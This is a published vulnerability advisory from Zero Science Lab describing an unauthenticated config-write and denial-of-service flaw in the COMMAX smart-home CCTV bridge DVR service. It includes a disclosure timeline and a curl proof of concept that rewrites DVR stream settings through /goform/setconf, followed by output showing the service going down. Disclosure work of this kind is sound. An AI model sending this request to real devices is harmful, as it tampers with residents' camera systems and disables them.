Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
Advisory ID: ZSL-2021-5666
Type: Local/Remote
Impact: Manipulation of Data, DoS
Risk: (4/5)
Release Date: 15.08.2021
COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety.
The application allows an unauthenticated attacker to change the configuration of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.
COMMAX Co., Ltd. - <https://www.commax.com>
N/A
GoAhead-Webs
[02.08.2021] Vulnerability discovered.
[03.08.2021] Vendor contacted.
[04.08.2021] Vendor contacted.
[05.08.2021] No response from the vendor.
[06.08.2021] Vendor contacted.
[14.08.2021] No response from the vendor.
[15.08.2021] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php>
[2] <https://www.exploit-db.com/exploits/50209>
[3] <https://packetstormsecurity.com/files/163852>
[4] <https://cxsecurity.com/issue/WLB-2021080066>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/207573>
[15.08.2021] - Initial release
[23.08.2021] - Added reference [2], [3], [4] and [5]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php
02.08.2021
--
#1
$ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"
* Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
> POST /goform/setconf HTTP/1.1
> Host: 192.168.1.1:8086
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 257
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Pragma: no-cache
< Cache-control: no-cache
< Content-Type: text/html
<
<br/><br/></p><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html><html><p>
* Closing connection 0
#2
$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
* Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
</p></html>